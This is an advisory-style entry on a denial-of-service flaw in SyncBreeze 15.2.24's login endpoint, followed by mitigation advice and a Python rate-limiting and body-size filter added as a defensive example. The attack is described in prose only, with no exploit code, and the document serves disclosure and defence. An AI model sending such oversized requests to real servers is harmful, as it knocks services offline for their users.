Vendor: SyncBreeze
By: mohamed youssef
CVSS: 7.5 (HIGH)
Denial of Service
Product Name: SyncBreeze
Affected Version From: 15.2.24
Affected Version To: 15.2.24
Patch Exists: NO
Related CWE:
CPE: syncbreeze
Platforms Tested: Windows 10 64-bit
2023
SyncBreeze 15.2.24 - 'login' Denial of Service
This exploit targets SyncBreeze version 15.2.24, a file synchronization product. By sending a specially crafted POST request with a large payload to the login endpoint, an attacker can overload the server and cause a denial of service (DoS) condition.
Mitigation:
Apply the latest patch or update to a newer version of SyncBreeze that fixes the vulnerability. Additionally, limit the number of login attempts per IP address and implement rate limiting to prevent DoS attacks.
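
One way to apply the rate-limiting advice above in a filtering layer placed in front of the service. This is an added example, not SyncBreeze code or part of the original advisory. The `/login` path, the thresholds, the lowercase header dictionary and the `LoginGate` name are all assumptions.

```python
import time
from collections import defaultdict, deque

MAX_LOGIN_BODY = 4096   # assumed cap: a login form is a few hundred bytes
MAX_ATTEMPTS = 5        # assumed per-IP limit inside one window
WINDOW_SECONDS = 60     # assumed sliding-window length


class LoginGate:
    """Decide from the request line and headers whether a login POST is forwarded."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._attempts = defaultdict(deque)  # ip -> timestamps of recent attempts

    def check(self, ip, method, path, headers):
        """Return (http_status, reason); 200 means forward to the backend.

        `headers` is assumed to be a dict with lowercase header names.
        """
        if method != "POST" or path != "/login":  # "/login" is an assumed path
            return 200, "not a login request"

        # Count the attempt first, so rejected oversized requests are throttled too.
        now = self._clock()
        recent = self._attempts[ip]
        while recent and now - recent[0] >= WINDOW_SECONDS:
            recent.popleft()
        if len(recent) >= MAX_ATTEMPTS:
            return 429, "too many login attempts"
        recent.append(now)

        # Decide on the declared length, before any body bytes are buffered.
        if "transfer-encoding" in headers:
            return 411, "chunked login body not accepted"
        raw = headers.get("content-length", "")
        if not (raw.isascii() and raw.isdigit()):
            return 411, "missing or malformed Content-Length"
        if int(raw) > MAX_LOGIN_BODY:
            return 413, "login body too large"
        return 200, "ok"
```

The layer that calls `check` must also stop reading after the declared `Content-Length` bytes, otherwise a client can declare a small body and still send a large one.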